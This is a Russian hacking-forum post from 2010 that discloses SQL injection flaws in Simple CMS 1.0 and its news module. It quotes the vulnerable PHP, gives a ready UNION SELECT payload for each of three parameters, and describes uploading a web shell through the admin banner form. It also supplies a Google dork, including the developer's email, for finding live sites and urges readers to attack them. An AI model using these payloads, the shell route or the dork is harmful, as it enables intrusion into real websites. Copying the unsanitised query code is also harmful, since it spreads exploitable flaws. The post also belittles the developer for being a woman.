Энциклопедия уязвимых скриптов

#11

02.11.2010, 20:29

-PRIVAT-

Участник форума

Регистрация: 17.04.2010

Сообщений: 221

С нами: 8456912

Репутация: 17

Уязвимости Simple CMS

О Simple CMS

От себя хочу сказать, что Simple CMS. ver.1.0. вся дырявая. Почти на каждом месте есть SQL inj.

По дорку гугла мне выдало "Результатов: примерно 14 800 (0,35 сек.)".

SQL инъекции:

SQL inj в выборе статьи, уязвимый код:

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'artcl'[/COLOR][COLOR="#007700"]])) { [/COLOR][COLOR="#0000BB"]$id_art[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'artcl'[/COLOR][COLOR="#007700"]]; [/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT title, article FROM artcl WHERE IDart="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id_art[/COLOR][COLOR="#007700"]); [/COLOR][/COLOR]

Как видно, нет никакой фильтрации..

Пример: localhost/index.php?id=3&artcl=-4 union select version(),2--

SQL inj в выборе раздела, уязвимый код:

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]])) { [/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]; } else { [/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]; } print[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$razdel[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT menu, txt FROM tree WHERE id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]); [/COLOR][/COLOR]

Пример: localhost/index.php?id=-3 union select 1,version()--

Незачем дальше перечислять, она вся в дырках.

К сожалению, хочу отметить, что пароли администраторов не хранятся в БД. Они находятся в файле connect.php.

Панель администратора находится по адресу /admin/, если вы попали в админку, то заходим: Баннеры > льём через форму загрузки баннеров шелл > шелл будет доступен по адресу images/shell.php

Вот вам пример, хекайте!

P.S Дорк "intext:Разработано Яшиной С. svetulik2004@mail.ru".

Модуль Новостей

Только что зашёл на официальный сайт в раздел Мои разработки, скачал модуль новостей и снова он бажный .

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id_news'[/COLOR][COLOR="#007700"]])) { [/COLOR][COLOR="#0000BB"]$id_news[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id_news'[/COLOR][COLOR="#007700"]]; [/COLOR][COLOR="#0000BB"]$news[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT rus_name, rus_annonce, rus_content, date FROM news WHERE id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id_news[/COLOR][COLOR="#007700"]); [/COLOR][/COLOR]

Пример: localhost/news/news.php?id_news=-2 union select version(),2,3,4--

З.Ы Писала движок девушка . Официальный сайт